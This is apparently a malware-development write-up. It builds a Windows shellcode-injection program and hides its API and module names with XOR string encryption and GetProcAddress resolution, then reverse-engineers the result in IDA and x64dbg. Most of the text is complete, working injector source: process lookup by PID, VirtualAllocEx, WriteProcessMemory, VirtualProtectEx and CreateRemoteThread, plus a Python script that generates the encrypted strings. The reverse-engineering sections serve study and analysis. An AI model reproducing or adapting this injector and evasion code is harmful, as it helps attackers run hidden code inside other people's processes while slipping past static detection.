def xor_encrypt( data, key ):
    # append the null terminator so it is encrypted along with the string
    data += b'\0'
    return bytes( [b ^ key for b in data] )

def format_variable_name( name ):
    if '.' in name:
        name = name.replace( '.', '_' )
    return name + '_encrypted'

def main():
    key = generate_xor_key()
    c_formatted_key = f'0x{key:02x}'
    with open( 'xor-list.txt', 'r' ) as file:
        api_names = file.readlines()
    for api_name in api_names:
        api_name = api_name.strip()
        api_name_bytes = api_name.encode()
        encrypted_api_name = xor_encrypt( api_name_bytes, key )
        c_formatted_encrypted = ', '.join( f'0x{b:02x}' for b in encrypted_api_name )
        variable_name = format_variable_name( api_name )
        # doubled braces emit literal { } around the byte list
        print( f"unsigned char {variable_name}[] = {{{c_formatted_encrypted}}};\n" )
    print( f"unsigned char key = {c_formatted_key};" )

if __name__ == '__main__':
    main()
Example output:
unsigned char user32_dll_encrypted[] = {0xac, 0xaa, 0xbc, 0xab, 0xea, 0xeb, 0xf7, 0xbd, 0xb5, 0xb5, 0xd9};
unsigned char MessageBoxA_encrypted[] = {0x94, 0xbc, 0xaa, 0xaa, 0xb8, 0xbe, 0xbc, 0x9b, 0xb6, 0xa1, 0x98, 0xd9};
unsigned char key = 0xd9;
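The following C XOR decryption function is used. It decrypts the byte array in place, given the encrypted bytes and their length. The key is hard-coded, so it has to match the key the script printed for the run that produced the arrays (the example output above used 0xd9, while the arrays in the example below were generated with 0x70):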
void xor_decrypt( unsigned char *data, int data_len )
{
unsigned char key = 0x70;
for( int i = 0; i < data_len; i++ )
{
data[i] ^= key;
}
}
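Because XOR is its own inverse, the same operation both encrypts and decrypts. The short sketch below checks this against the example output shown earlier (the user32_dll_encrypted array and its key 0xd9); the xor_bytes helper is a hypothetical name used only for this illustration.

```python
def xor_bytes(data, key):
    """XOR every byte with a single-byte key; the same call encrypts and decrypts."""
    return bytes(b ^ key for b in data)

# Byte array and key copied from the example output above.
user32_dll_encrypted = bytes([0xac, 0xaa, 0xbc, 0xab, 0xea, 0xeb,
                              0xf7, 0xbd, 0xb5, 0xb5, 0xd9])
key = 0xd9

decrypted = xor_bytes(user32_dll_encrypted, key)
print(decrypted)  # the original string followed by its null terminator

# Applying the same key again restores the encrypted bytes.
round_trip = xor_bytes(decrypted, key)
```

Note that the last encrypted byte equals the key itself: the script encrypts the trailing null terminator, and 0x00 XOR key is just the key.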
Putting it together in a simple example, we can XOR encrypt the user32.dll string and the MessageBoxA string, and decrypt each one in memory right before we use it:
#include <stdio.h>
#include <string.h>
#include <windows.h>
//
// XOR Decryption Function
//
void xor_decrypt( unsigned char *data, int data_len )
{
unsigned char key = 0x70;
for( int i = 0; i < data_len; i++ )
{
data[i] ^= key;
}
}
int main()
{
unsigned char user32_dll_encrypted[] = {0x05, 0x03, 0x15, 0x02, 0x43, 0x42, 0x5e, 0x14, 0x1c, 0x1c, 0x70};
unsigned char MessageBoxA_encrypted[] = {0x3d, 0x15, 0x03, 0x03, 0x11, 0x17, 0x15, 0x32, 0x1f, 0x08, 0x31, 0x70};
xor_decrypt( user32_dll_encrypted, sizeof(user32_dll_encrypted) );
HMODULE user32_handle = LoadLibraryA( user32_dll_encrypted );
if( NULL == user32_handle )
{
DWORD dwError = GetLastError();
return 1;
}
// Function pointer matching the ANSI MessageBoxA signature (LPCSTR parameters)
int( WINAPI * _MessageBox )
(
    HWND hWnd,
    LPCSTR lpText,
    LPCSTR lpCaption,
    UINT uType
);
// decrypt the API name in place right before it is needed
xor_decrypt( MessageBoxA_encrypted, sizeof(MessageBoxA_encrypted) );
_MessageBox = ( int (WINAPI *)
(
    HWND hWnd,
    LPCSTR lpText,
    LPCSTR lpCaption,
    UINT uType
)) GetProcAddress( user32_handle, MessageBoxA_encrypted );
if( NULL == _MessageBox )
{
// printf( "Could not initialize _MessageBox!\n" );
return 1;
}
_MessageBox( NULL, "wowowow!", "boo!", MB_OK );
return 0;
}
After compiling and opening it in IDA, we no longer see the user32.dll and MessageBoxA strings. In addition, the generated pseudocode can no longer tell which function is being called through the resolved pointer. The above program’s message box call in IDA’s pseudocode looks like:
((void (__fastcall *)(_QWORD, char *, char *, _QWORD))ProcAddress)(0LL, aWowooww, aBoo, 0LL);
Compared to the previous section’s program, where IDA was able to tell which function was being called through the resolved pointer, this program is more obfuscated. We can apply the same logic to obfuscate the rest of the strings, such as kernel32.dll and the remaining API names. Below is the list (xor-list.txt) of strings I want to encrypt.
kernel32.dll
user32.dll
CreateToolhelp32Snapshot
Process32First
Process32Next
OpenProcess
VirtualAllocEx
WriteProcessMemory
VirtualProtectEx
CreateRemoteThread
An example of applying an XOR encrypted string in the program is shown below for the VirtualAllocEx API. Before we resolve the API, we define its name as an encrypted byte array (VirtualAllocEx_encrypted) and decrypt it in place. Then we pass the decrypted byte array to the GetProcAddress call.
//
// ALLOCATE MEMORY IN TARGET PROCESS
//
size_t payload_size = sizeof( payload );
LPVOID target_process_allocated_memory = NULL;
unsigned char VirtualAllocEx_encrypted[] = { 0x01, 0x3e, 0x25, 0x23, 0x22, 0x36, 0x3b, 0x16, 0x3b, 0x3b, 0x38, 0x34, 0x12, 0x2f, 0x57 };
xor_decrypt( VirtualAllocEx_encrypted, sizeof(VirtualAllocEx_encrypted) );
LPVOID( WINAPI * _VirtualAllocEx )
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);
_VirtualAllocEx = ( LPVOID( WINAPI *)
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
)) GetProcAddress( kernel32_dll_handle, VirtualAllocEx_encrypted );
if( NULL == _VirtualAllocEx )
{
// printf( "Could not resolve VirtualAllocEx!\n" );
return 1;
}
target_process_allocated_memory = _VirtualAllocEx( target_process, NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
if( NULL == target_process_allocated_memory )
{
// printf( "[!] Could not allocate memory!\n" );
return 1;
}
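From the analysis side, it is worth seeing how little protection a single-byte XOR key gives once an analyst spots the byte array. The sketch below tries all 256 keys against the VirtualAllocEx_encrypted array shown above and keeps the one that yields a printable, null-terminated string. The recover_single_byte_key helper is a hypothetical name, and the printable-ASCII heuristic is my own assumption about what a plausible plaintext looks like.

```python
def recover_single_byte_key(encrypted):
    """Brute-force a one-byte XOR key; return (key, text) or None if nothing fits."""
    for key in range(256):
        plain = bytes(b ^ key for b in encrypted)
        body, terminator = plain[:-1], plain[-1]
        # Heuristic: a C string should be printable ASCII ending in a single NUL.
        if terminator == 0 and body and all(0x20 <= c <= 0x7e for c in body):
            return key, body.decode("ascii")
    return None

# Byte array copied from the VirtualAllocEx example above.
VirtualAllocEx_encrypted = bytes([0x01, 0x3e, 0x25, 0x23, 0x22, 0x36, 0x3b, 0x16,
                                  0x3b, 0x3b, 0x38, 0x34, 0x12, 0x2f, 0x57])

result = recover_single_byte_key(VirtualAllocEx_encrypted)
print(result)
```

Because the null terminator is encrypted as well, the last byte of every array is the key, so the brute force is not even strictly necessary. This is why the technique only raises the bar for basic static analysis.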
We can repeat the process so that all the API and module name strings listed above are encrypted and thus hidden from the IAT and the strings list, which makes static analysis slightly harder overall (shown in the next section). Here is the finalized code with all the module/API strings XOR encrypted:
#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <TlHelp32.h>
#include "payload.h"
//
// XOR Decryption Function
//
void xor_decrypt( unsigned char *data, int data_len )
{
unsigned char key = 0x57;
for( int i = 0; i < data_len; i++ )
{
data[i] ^= key;
}
}
int main( int argc, char* argv[] )
{
if( argc < 2 )
{
return 1;
}
HANDLE process_snapshot;
HANDLE target_process = NULL;
PROCESSENTRY32 current_process;
DWORD process_id = atoi( argv[1] );
//
// ENUMERATE RUNNING PROCESSES TO ENSURE PID IS VALID
//
unsigned char kernel32_dll_encrypted[] = { 0x3c, 0x32, 0x25, 0x39, 0x32, 0x3b, 0x64, 0x65, 0x79, 0x33, 0x3b, 0x3b, 0x57 };
xor_decrypt( kernel32_dll_encrypted, sizeof(kernel32_dll_encrypted) );
HMODULE kernel32_dll_handle = LoadLibraryA( kernel32_dll_encrypted );
if( NULL == kernel32_dll_handle )
{
// printf( "Could not load kernel32.dll!\n" );
return 1;
}
unsigned char CreateToolhelp32Snapshot_encrypted[] = { 0x14, 0x25, 0x32, 0x36, 0x23, 0x32, 0x03, 0x38, 0x38, 0x3b, 0x3f, 0x32, 0x3b, 0x27, 0x64, 0x65, 0x04, 0x39, 0x36, 0x27, 0x24, 0x3f, 0x38, 0x23, 0x57 };
xor_decrypt( CreateToolhelp32Snapshot_encrypted, sizeof(CreateToolhelp32Snapshot_encrypted) );
HANDLE( WINAPI * _CreateToolhelp32Snapshot )
(
DWORD dwFlags,
DWORD th32ProcessID
);
_CreateToolhelp32Snapshot = (HANDLE (WINAPI *)
(
DWORD dwFlags,
DWORD th32ProcessID
)) GetProcAddress( kernel32_dll_handle, CreateToolhelp32Snapshot_encrypted );
if( NULL == _CreateToolhelp32Snapshot )
{
// printf( "Could not resolve CreateToolhelp32Snapshot!\n" );
return 1;
}
process_snapshot = _CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
if( NULL == process_snapshot )
{
return 1;
}
current_process.dwSize = sizeof( PROCESSENTRY32 );
unsigned char Process32First_encrypted[] = { 0x07, 0x25, 0x38, 0x34, 0x32, 0x24, 0x24, 0x64, 0x65, 0x11, 0x3e, 0x25, 0x24, 0x23, 0x57 };
xor_decrypt( Process32First_encrypted, sizeof(Process32First_encrypted) );
BOOL( WINAPI * _Process32First)
(
HANDLE hSnapshot,
LPPROCESSENTRY32 lppe
);
_Process32First = ( BOOL (WINAPI *)
(
HANDLE hSnapshot,
LPPROCESSENTRY32 lppe
)) GetProcAddress( kernel32_dll_handle, Process32First_encrypted );
if( NULL == _Process32First )
{
// printf( "Could not resolve Process32First!\n" );
return 1;
}
_Process32First( process_snapshot, &current_process );
BOOL( WINAPI * _Process32Next)
(
HANDLE hSnapshot,
LPPROCESSENTRY32 lppe
);
unsigned char Process32Next_encrypted[] = { 0x07, 0x25, 0x38, 0x34, 0x32, 0x24, 0x24, 0x64, 0x65, 0x19, 0x32, 0x2f, 0x23, 0x57 };
xor_decrypt( Process32Next_encrypted, sizeof(Process32Next_encrypted) );
_Process32Next = ( BOOL (WINAPI *)
(
HANDLE hSnapshot,
LPPROCESSENTRY32 lppe
)) GetProcAddress( kernel32_dll_handle, Process32Next_encrypted );
if( NULL == _Process32Next )
{
// printf( "Could not resolve Process32Next!\n" );
return 1;
}
do
{
// printf( "process id = %d\n", current_process.th32ProcessID );
if( process_id == current_process.th32ProcessID )
{
unsigned char OpenProcess_encrypted[] = { 0x18, 0x27, 0x32, 0x39, 0x07, 0x25, 0x38, 0x34, 0x32, 0x24, 0x24, 0x57 };
xor_decrypt( OpenProcess_encrypted, sizeof(OpenProcess_encrypted) );
HANDLE( WINAPI * _OpenProcess )
(
DWORD dwDesiredAccess,
BOOL bInheritHandle,
DWORD dwProcessId
);
_OpenProcess = ( HANDLE (WINAPI *)
(
DWORD dwDesiredAccess,
BOOL bInheritHandle,
DWORD dwProcessId
)) GetProcAddress( kernel32_dll_handle, OpenProcess_encrypted );
if( NULL == _OpenProcess )
{
// printf( "Could not resolve OpenProcess!\n" );
return 1;
}
target_process = _OpenProcess( PROCESS_ALL_ACCESS, TRUE, current_process.th32ProcessID );
break;
}
}
while( _Process32Next(process_snapshot, &current_process) );
CloseHandle( process_snapshot );
if( NULL == target_process )
{
return 1;
}
//
// ALLOCATE MEMORY IN TARGET PROCESS
//
size_t payload_size = sizeof( payload );
LPVOID target_process_allocated_memory = NULL;
unsigned char VirtualAllocEx_encrypted[] = { 0x01, 0x3e, 0x25, 0x23, 0x22, 0x36, 0x3b, 0x16, 0x3b, 0x3b, 0x38, 0x34, 0x12, 0x2f, 0x57 };
xor_decrypt( VirtualAllocEx_encrypted, sizeof(VirtualAllocEx_encrypted) );
LPVOID( WINAPI * _VirtualAllocEx )
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
);
_VirtualAllocEx = ( LPVOID( WINAPI *)
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flAllocationType,
DWORD flProtect
)) GetProcAddress( kernel32_dll_handle, VirtualAllocEx_encrypted );
if( NULL == _VirtualAllocEx )
{
// printf( "Could not resolve VirtualAllocEx!\n" );
return 1;
}
target_process_allocated_memory = _VirtualAllocEx( target_process, NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );
if( NULL == target_process_allocated_memory )
{
// printf( "[!] Could not allocate memory!\n" );
return 1;
}
// printf( "[+] Successfully allocated memory!\n" );
//
// WRITE TO ALLOCATED MEMORY
//
BOOL return_check = FALSE;
unsigned char WriteProcessMemory_encrypted[] = { 0x00, 0x25, 0x3e, 0x23, 0x32, 0x07, 0x25, 0x38, 0x34, 0x32, 0x24, 0x24, 0x1a, 0x32, 0x3a, 0x38, 0x25, 0x2e, 0x57 };
xor_decrypt( WriteProcessMemory_encrypted, sizeof(WriteProcessMemory_encrypted) );
BOOL( WINAPI * _WriteProcessMemory )
(
HANDLE hProcess,
LPVOID lpBaseAddress,
LPCVOID lpBuffer,
SIZE_T nSize,
SIZE_T *lpNumberOfBytesWritten
);
_WriteProcessMemory = ( BOOL(WINAPI *)
(
HANDLE hProcess,
LPVOID lpBaseAddress,
LPCVOID lpBuffer,
SIZE_T nSize,
SIZE_T *lpNumberOfBytesWritten
)) GetProcAddress( kernel32_dll_handle, WriteProcessMemory_encrypted );
if( NULL == _WriteProcessMemory )
{
// printf( "Could not resolve WriteProcessMemory!\n" );
return 1;
}
return_check = _WriteProcessMemory( target_process, target_process_allocated_memory, payload, payload_size, NULL );
if( FALSE == return_check )
{
// printf( "[+] WriteProcessMemory returned false!\n" );
return 1;
}
//
// UPDATE PERMISSIONS TO ALLOW EXECUTION
//
DWORD old_protect = 0;
unsigned char VirtualProtectEx_encrypted[] = { 0x01, 0x3e, 0x25, 0x23, 0x22, 0x36, 0x3b, 0x07, 0x25, 0x38, 0x23, 0x32, 0x34, 0x23, 0x12, 0x2f, 0x57 };
xor_decrypt( VirtualProtectEx_encrypted, sizeof(VirtualProtectEx_encrypted) );
BOOL( WINAPI * _VirtualProtectEx )
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flNewProtect,
PDWORD lpflOldProtect
);
_VirtualProtectEx = ( BOOL(WINAPI *)
(
HANDLE hProcess,
LPVOID lpAddress,
SIZE_T dwSize,
DWORD flNewProtect,
PDWORD lpflOldProtect
)) GetProcAddress( kernel32_dll_handle, VirtualProtectEx_encrypted );
if( NULL == _VirtualProtectEx )
{
// printf( "Could not resolve VirtualProtectEx!\n" );
return 0;
}
return_check = _VirtualProtectEx( target_process, target_process_allocated_memory, payload_size, PAGE_EXECUTE_READWRITE, &old_protect );
if( FALSE == return_check )
{
// printf( "[!] VirtualProtectEx() returned false! Error code: %d\n", GetLastError() );
return 1;
}
//
// EXECUTE SHELLCODE IN ALLOCATED MEMORY
//
HANDLE handle_remote_thread = NULL;
unsigned char CreateRemoteThread_encrypted[] = { 0x14, 0x25, 0x32, 0x36, 0x23, 0x32, 0x05, 0x32, 0x3a, 0x38, 0x23, 0x32, 0x03, 0x3f, 0x25, 0x32, 0x36, 0x33, 0x57 };
xor_decrypt( CreateRemoteThread_encrypted, sizeof(CreateRemoteThread_encrypted) );
HANDLE( WINAPI * _CreateRemoteThread )
(
HANDLE hProcess,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
SIZE_T dwStackSize,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
DWORD dwCreationFlags,
LPDWORD lpThreadId
);
_CreateRemoteThread = ( HANDLE(WINAPI *)
(
HANDLE hProcess,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
SIZE_T dwStackSize,
LPTHREAD_START_ROUTINE lpStartAddress,
LPVOID lpParameter,
DWORD dwCreationFlags,
LPDWORD lpThreadId
)) GetProcAddress( kernel32_dll_handle, CreateRemoteThread_encrypted );
if( NULL == _CreateRemoteThread )
{
// printf( "Could not resolve CreateRemoteThread!\n" );
return 1;
}
handle_remote_thread = _CreateRemoteThread( target_process, NULL, 0, target_process_allocated_memory, NULL, 0, NULL );
if( NULL == handle_remote_thread )
{
// printf( "[!] CreateRemoteThread() failed!\n" );
return 1;
}
return 0;
}
Static Analysis of encrypted-apis.exe
To start off, looking at the IAT and the strings table within IDA doesn’t give us any solid indication of what the program does. Two interesting APIs that do show up in the IAT are LoadLibraryA and GetProcAddress, but the strings table doesn’t immediately show how they are being used. Shown below is the pseudocode that IDA generated.
int __fastcall main(int argc, const char **argv, const char **envp)
{
HMODULE hModule; // [rsp+48h] [rbp-270h]
__int64 v5; // [rsp+50h] [rbp-268h]
__int64 v6; // [rsp+58h] [rbp-260h]
HANDLE hObject; // [rsp+60h] [rbp-258h]
int v8; // [rsp+68h] [rbp-250h]
int v9; // [rsp+6Ch] [rbp-24Ch] BYREF
__int64 v10; // [rsp+70h] [rbp-248h]
FARPROC ProcAddress; // [rsp+78h] [rbp-240h]
FARPROC v12; // [rsp+80h] [rbp-238h]
FARPROC v13; // [rsp+88h] [rbp-230h]
FARPROC v14; // [rsp+90h] [rbp-228h]
FARPROC v15; // [rsp+98h] [rbp-220h]
FARPROC v16; // [rsp+A0h] [rbp-218h]
FARPROC v17; // [rsp+A8h] [rbp-210h]
FARPROC v18; // [rsp+B0h] [rbp-208h]
__int64 v19; // [rsp+B8h] [rbp-200h]
int v20; // [rsp+C0h] [rbp-1F8h] BYREF
unsigned int v21; // [rsp+C8h] [rbp-1F0h]
CHAR v22; // [rsp+1F0h] [rbp-C8h] BYREF
char v23[11]; // [rsp+1F1h] [rbp-C7h] BYREF
CHAR LibFileName[16]; // [rsp+200h] [rbp-B8h] BYREF
CHAR v25[10]; // [rsp+210h] [rbp-A8h] BYREF
char v26[4]; // [rsp+21Ah] [rbp-9Eh] BYREF
CHAR v27[10]; // [rsp+220h] [rbp-98h] BYREF
char v28[5]; // [rsp+22Ah] [rbp-8Eh] BYREF
CHAR v29[13]; // [rsp+230h] [rbp-88h] BYREF
char v30[2]; // [rsp+23Dh] [rbp-7Bh] BYREF
CHAR v31[15]; // [rsp+240h] [rbp-78h] BYREF
char v32[2]; // [rsp+24Fh] [rbp-69h] BYREF
CHAR v33[13]; // [rsp+258h] [rbp-60h] BYREF
char v34[6]; // [rsp+265h] [rbp-53h] BYREF
CHAR v35[13]; // [rsp+270h] [rbp-48h] BYREF
char v36[6]; // [rsp+27Dh] [rbp-3Bh] BYREF
CHAR ProcName[17]; // [rsp+288h] [rbp-30h] BYREF
char v38[8]; // [rsp+299h] [rbp-1Fh] BYREF
if ( argc < 2 )
return 1;
v5 = 0LL;
v8 = unknown_libname_19(argv[1], argv, envp);
qmemcpy(LibFileName, "<2%92;dey3;;W", 13);
sub_140001000((__int64)LibFileName, 0xDu);
hModule = LoadLibraryA(LibFileName);
if ( !hModule )
return 1;
ProcName[0] = 20;
ProcName[1] = 37;
ProcName[2] = 50;
ProcName[3] = 54;
ProcName[4] = 35;
ProcName[5] = 50;
ProcName[6] = 3;
ProcName[7] = 56;
ProcName[8] = 56;
ProcName[9] = 59;
ProcName[10] = 63;
ProcName[11] = 50;
ProcName[12] = 59;
ProcName[13] = 39;
ProcName[14] = 100;
ProcName[15] = 101;
ProcName[16] = 4;
qmemcpy(v38, "96'$?8#W", sizeof(v38));
sub_140001000((__int64)ProcName, 0x19u);
ProcAddress = GetProcAddress(hModule, ProcName);
if ( !ProcAddress )
return 1;
hObject = (HANDLE)((__int64 (__fastcall *)(__int64, _QWORD))ProcAddress)(2LL, 0LL);
if ( !hObject )
return 1;
v20 = 304;
v27[0] = 7;
v27[1] = 37;
v27[2] = 56;
v27[3] = 52;
v27[4] = 50;
v27[5] = 36;
v27[6] = 36;
v27[7] = 100;
v27[8] = 101;
v27[9] = 17;
qmemcpy(v28, ">%$#W", sizeof(v28));
sub_140001000((__int64)v27, 15u);
v12 = GetProcAddress(hModule, v27);
if ( !v12 )
return 1;
((void (__fastcall *)(HANDLE, int *))v12)(hObject, &v20);
v25[0] = 7;
v25[1] = 37;
v25[2] = 56;
v25[3] = 52;
v25[4] = 50;
v25[5] = 36;
v25[6] = 36;
v25[7] = 100;
v25[8] = 101;
v25[9] = 25;
qmemcpy(v26, "2/#W", sizeof(v26));
sub_140001000((__int64)v25, 0xEu);
v14 = GetProcAddress(hModule, v25);
if ( !v14 )
return 1;
while ( v8 != v21 )
{
if ( !((unsigned int (__fastcall *)(HANDLE, int *))v14)(hObject, &v20) )
goto LABEL_18;
}
v22 = 24;
qmemcpy(v23, "'29\a%842$$W", sizeof(v23));
sub_140001000((__int64)&v22, 0xCu);
v13 = GetProcAddress(hModule, &v22);
if ( !v13 )
return 1;
v5 = ((__int64 (__fastcall *)(__int64, __int64, _QWORD))v13)(0x1FFFFFLL, 1LL, v21);
LABEL_18:
CloseHandle(hObject);
if ( !v5 )
return 1;
v10 = 3072LL;
v29[0] = 1;
v29[1] = 62;
v29[2] = 37;
v29[3] = 35;
v29[4] = 34;
v29[5] = 54;
v29[6] = 59;
v29[7] = 22;
v29[8] = 59;
v29[9] = 59;
v29[10] = 56;
v29[11] = 52;
v29[12] = 18;
qmemcpy(v30, "/W", sizeof(v30));
sub_140001000((__int64)v29, 0xFu);
v15 = GetProcAddress(hModule, v29);
if ( !v15 )
return 1;
v6 = ((__int64 (__fastcall *)(__int64, _QWORD, __int64, __int64, int))v15)(v5, 0LL, v10, 12288LL, 4);
if ( !v6 )
return 1;
v33[0] = 0;
v33[1] = 37;
v33[2] = 62;
v33[3] = 35;
v33[4] = 50;
v33[5] = 7;
v33[6] = 37;
v33[7] = 56;
v33[8] = 52;
v33[9] = 50;
v33[10] = 36;
v33[11] = 36;
v33[12] = 26;
qmemcpy(v34, "2:8%.W", sizeof(v34));
sub_140001000((__int64)v33, 0x13u);
v16 = GetProcAddress(hModule, v33);
if ( !v16 )
return 1;
if ( !((unsigned int (__fastcall *)(__int64, __int64, void *, __int64, _QWORD))v16)(v5, v6, &unk_14001C000, v10, 0LL) )
return 1;
v9 = 0;
v31[0] = 1;
v31[1] = 62;
v31[2] = 37;
v31[3] = 35;
v31[4] = 34;
v31[5] = 54;
v31[6] = 59;
v31[7] = 7;
v31[8] = 37;
v31[9] = 56;
v31[10] = 35;
v31[11] = 50;
v31[12] = 52;
v31[13] = 35;
v31[14] = 18;
qmemcpy(v32, "/W", sizeof(v32));
sub_140001000((__int64)v31, 0x11u);
v17 = GetProcAddress(hModule, v31);
if ( !v17 )
return 0;
if ( !((unsigned int (__fastcall *)(__int64, __int64, __int64, __int64, int *))v17)(v5, v6, v10, 64LL, &v9) )
return 1;
v19 = 0LL;
v35[0] = 20;
v35[1] = 37;
v35[2] = 50;
v35[3] = 54;
v35[4] = 35;
v35[5] = 50;
v35[6] = 5;
v35[7] = 50;
v35[8] = 58;
v35[9] = 56;
v35[10] = 35;
v35[11] = 50;
v35[12] = 3;
qmemcpy(v36, "?%263W", sizeof(v36));
sub_140001000((__int64)v35, 0x13u);
v18 = GetProcAddress(hModule, v35);
if ( !v18 )
return 1;
v19 = ((__int64 (__fastcall *)(__int64, _QWORD, _QWORD, __int64, _QWORD, _DWORD, _QWORD))v18)(
v5,
0LL,
0LL,
v6,
0LL,
0,
0LL);
return v19 == 0;
}
In the pseudocode that’s been generated, we can see a general pattern:
- The program defines some sort of string
- sub_140001000 is called with the defined string and an integer as the arguments
- GetProcAddress is called with the same string that was passed to sub_140001000, and the address returned is saved in a variable
- The variable from the third step is cast to a function pointer type with some sort of function signature
Looking into what sub_140001000 does:
__int64 __fastcall sub_140001000(__int64 a1, unsigned int a2)
{
__int64 result; // rax
int i; // [rsp+4h] [rbp-14h]
for ( i = 0; ; ++i )
{
result = a2;
if ( i >= (int)a2 )
break;
*(_BYTE *)(a1 + i) ^= 0x57u;
}
return result;
}
First, the decompiler types the first argument as a 64-bit integer rather than as a pointer to a string. We can fix that with Set item type (which changes the arguments/function signature) so that the function takes a char *, i.e. a string. Doing so updates the pseudocode like so:
__int64 __fastcall sub_140001000(char *a1, unsigned int a2)
{
__int64 result; // rax
signed int i; // [rsp+4h] [rbp-14h]
for ( i = 0; ; ++i )
{
result = a2;
if ( i >= (int)a2 )
break;
a1[i] ^= 0x57u;
}
return result;
}
From this, we can see that the for loop runs until i reaches a2 (which we assume is the length), XORing each character of the string with 0x57 along the way. To attempt to decrypt one of the strings, I took ProcName from the pseudocode and first converted its bytes to hexadecimal:
ProcName[0] = 0x14;
ProcName[1] = 0x25;
ProcName[2] = 0x32;
ProcName[3] = 0x36;
ProcName[4] = 0x23;
ProcName[5] = 0x32;
ProcName[6] = 3;
ProcName[7] = 0x38;
ProcName[8] = 0x38;
ProcName[9] = 0x3B;
ProcName[10] = 0x3F;
ProcName[11] = 0x32;
ProcName[12] = 0x3B;
ProcName[13] = 0x27;
ProcName[14] = 0x64;
ProcName[15] = 0x65;
ProcName[16] = 4;
qmemcpy(v38, "96'$?8#W", sizeof(v38));
sub_140001000(ProcName, 25u);
ProcAddress = GetProcAddress(hModule, ProcName);
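As a quick sanity check on the snippet above, the following sketch rebuilds the buffer that sub_140001000 receives. It assumes, based on the stack offsets in the pseudocode (ProcName at rbp-30h, v38 at rbp-1Fh), that v38 sits directly after the 17 bytes of ProcName, so the 17 assigned bytes and the 8-byte qmemcpy literal form one contiguous 25-byte (0x19) buffer. The variable names are only for illustration.

```python
# Bytes IDA shows as individual assignments to ProcName[0..16]
assigned = [0x14, 0x25, 0x32, 0x36, 0x23, 0x32, 0x03, 0x38, 0x38,
            0x3B, 0x3F, 0x32, 0x3B, 0x27, 0x64, 0x65, 0x04]

# Bytes IDA folds into qmemcpy(v38, "96'$?8#W", sizeof(v38))
copied = b"96'$?8#W"

# The two pieces are adjacent on the stack, so they form one buffer
buffer = bytes(assigned) + copied

print(len(buffer))      # 25, matching the 0x19 length passed to sub_140001000
print(buffer.hex(" "))  # the full encrypted byte sequence
```

The last byte is 0x57, which is the encrypted NUL terminator (0x00 XOR 0x57).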
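Looking at this code in IDA, we can see more hex values being written into the string. These are the bytes that the pseudocode folds into the qmemcpy call (0x39, 0x36, 0x27, 0x24, 0x3F, 0x38, 0x23, 0x57).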
I wrote a python3 program, string-dec.py, to XOR the bytes with the key, convert the result to a string, and print it. Here is the program and the output:
# encrypted bytes taken from ProcName (the trailing 0x57 is the encrypted NUL terminator)
enc_string = b'\x14\x25\x32\x36\x23\x32\x03\x38\x38\x3b\x3f\x32\x3b\x27\x64\x65\x04\x39\x36\x27\x24\x3f\x38\x23\x57'
xor_key = b'\x57'
plaintext = []
# XOR every byte with the single-byte key
for byte in enc_string:
    xor_byte = byte ^ xor_key[0]
    plaintext.append( xor_byte )
byte_string = bytes( plaintext )
# drop the decrypted NUL terminator before decoding
resulting_string = byte_string.rstrip( b'\x00' ).decode('utf-8')
print( resulting_string )
> python3 string-dec.py
CreateToolhelp32Snapshot
This shows that the encrypted API name is CreateToolhelp32Snapshot. Following the same procedure for the other strings reveals all the API calls being resolved using GetProcAddress.
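To avoid repeating the conversion by hand for each string, the same procedure can be wrapped in a small helper. This is only a sketch and is not part of the project files: the decode function and the fragments table are hypothetical names, and the byte values are copied from the IDA pseudocode above (the individually assigned bytes followed by the qmemcpy literal for each variable).

```python
XOR_KEY = 0x57  # single-byte key seen in sub_140001000


def decode(assigned, copied=b""):
    """XOR-decode a stack string that IDA shows as assigned bytes plus a qmemcpy literal."""
    raw = bytes(assigned) + copied
    plain = bytes(b ^ XOR_KEY for b in raw)
    # The final byte decrypts to the NUL terminator, so strip it
    return plain.rstrip(b"\x00").decode("ascii")


# IDA variable name -> (individually assigned bytes, qmemcpy literal)
fragments = {
    "LibFileName": ([], b"<2%92;dey3;;W"),
    "v27": ([7, 37, 56, 52, 50, 36, 36, 100, 101, 17], b">%$#W"),
    "v25": ([7, 37, 56, 52, 50, 36, 36, 100, 101, 25], b"2/#W"),
    "v22": ([24], b"'29\a%842$$W"),
}

for name, (assigned, copied) in fragments.items():
    print(name, "->", decode(assigned, copied))
```

Run against the four entries above, this should print kernel32.dll, Process32First, Process32Next and OpenProcess. The remaining variables (v29, v31, v33, v35) can be added to the table in the same way.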
As an alternative approach via dynamic analysis, I also looked at the program in x64dbg. First load the program into the debugger and make sure to add the PID argument: under File > Change Command Line, add the PID after the closing quotation mark of the program path (e.g. "C:\Malware Dev\api-obfuscation\encrypted-apis.exe" 4188). Then I set a breakpoint on GetProcAddress so that execution stops every time it is called. To do this, go to the Symbols tab, click on kernel32.dll, look for GetProcAddress, then right click it and click Toggle Breakpoint. Running the program from the toolbar at the top will now stop every time the API is called. After stepping through some of the GetProcAddress calls, we reach the point where the name of the API being resolved shows up in the RDX register. An example is shown below where CreateToolhelp32Snapshot is being resolved:
You can see the instruction pointer RIP sitting at the GetProcAddress breakpoint, with CreateToolhelp32Snapshot passed as its second argument, which the x64 calling convention places in RDX. Clicking the forward arrow at the top continues execution, and the debugger stops again at each GetProcAddress call, where we can read the name of the API being resolved from the RDX register. By doing this, we can see the rest of the API names being resolved in plaintext and can therefore conclude what the program is doing.
Conclusion, Further Possibilities and Considerations
This writeup went over the process of developing a simple malware program for shellcode injection and applying various obfuscation techniques to evade static analysis. Through the use of API obfuscation and string encryption, we demonstrated how these techniques can hinder reverse engineering efforts, making it more challenging (but not impossible!) to analyze the program using standard tools like IDA.
